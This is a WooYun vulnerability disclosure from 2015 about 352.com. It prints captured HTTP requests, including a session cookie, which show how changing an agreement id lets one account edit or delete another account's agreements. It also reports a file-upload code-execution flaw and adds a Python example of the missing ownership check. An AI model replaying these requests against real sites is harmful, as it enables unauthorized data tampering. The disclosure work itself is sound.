WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2015-06-05: Details have been sent to the vendor and are awaiting the vendor's handling
2015-06-05: Vendor has confirmed; details are disclosed to the vendor only
2015-06-15: Details disclosed to core white hats and experts in related fields
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public
As in the title.
1. Unauthorized modification. Register two accounts; with account A, create an arbitrary agreement.
Click "view agreement" and note the agreement id.
With account B, create an agreement.
With account A, click "modify" and capture the request:
POST /member/agr/updateAgr.do HTTP/1.1
Host: www.352.com
Proxy-Connection: keep-alive
Content-Length: 100
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.352.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.352.com/member/agr/agrInfo.do?agrId=189090&operate=edit&signState=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433471836; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433471837; WHOSYOURDADDY=1

agree.id=189090&signState=0&agree.agrName=2222222222&agree.agrType=101&agree.agrContent=222222222222
Change agree.id to the other account's agreement id and the modification succeeds.
2. Unauthorized deletion. Delete an agreement and capture the request:
GET /member/agr/deleteAgr.do?&signState=0&agrId=189091 HTTP/1.1
Host: www.352.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://www.352.com/member/agr/myAgr.do?signState=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433472675; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433472675; WHOSYOURDADDY=1
It is, surprisingly, a GET request; change agrId and the deletion succeeds.
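The ownership check that updateAgr.do and deleteAgr.do lack, as an added example that is not the report's or 352.com's own code: the in-memory store, the account names and the handler signatures are assumptions, and the agreement ids are the ones from the captured requests.

```python
# Added example (not code from the original report or from 352.com): the server-side
# ownership check that /member/agr/updateAgr.do and deleteAgr.do were missing.
# Constructed sample store keyed by agreement id, reusing the ids from the report
AGREEMENTS = {
    189090: {"owner": "accountA", "name": "A's agreement"},
    189091: {"owner": "accountB", "name": "B's agreement"},
}

class HttpError(Exception):
    def __init__(self, status, msg):
        super().__init__(msg)
        self.status = status

def _owned_by(user, agr_id):
    """Load an agreement and refuse unless the session user owns it."""
    agr = AGREEMENTS.get(agr_id)
    # Same response for 'missing' and 'not yours', so ids cannot be enumerated
    if agr is None or agr["owner"] != user:
        raise HttpError(403, f"agreement {agr_id} is not accessible by {user}")
    return agr

def vulnerable_update_agr(user, params):
    """The reported behaviour: agree.id is trusted and the session user is ignored."""
    agr = AGREEMENTS[int(params["agree.id"])]
    agr["name"] = params["agree.agrName"]
    return agr

def update_agr(user, method, params):
    """Hardened updateAgr: POST only, and the record must belong to the user."""
    if method != "POST":
        raise HttpError(405, "state-changing request must use POST")
    agr = _owned_by(user, int(params["agree.id"]))
    agr["name"] = params["agree.agrName"]
    return agr

def delete_agr(user, method, params):
    """Hardened deleteAgr: the original accepted GET, which is refused here."""
    if method != "POST":
        raise HttpError(405, "state-changing request must use POST")
    agr_id = int(params["agrId"])
    _owned_by(user, agr_id)
    del AGREEMENTS[agr_id]
    return agr_id

def outcome(handler, *args):
    """Run a handler and report the result as an HTTP-style status code."""
    try:
        handler(*args)
        return 200
    except HttpError as e:
        return e.status
```

The same check belongs on every read and write path that takes an agreement id, not only on these two handlers.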
3. As a bonus: arbitrary file upload in the résumé section of job.352.com leads to malicious code execution: http://www.352.com/upimages/1433469247878.html
Access control. Every time I come out of Shenzhen North Station I see the huge 融资城 sign! I hear there are gifts?
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-06-05 11:55
Thank you for your help
None yet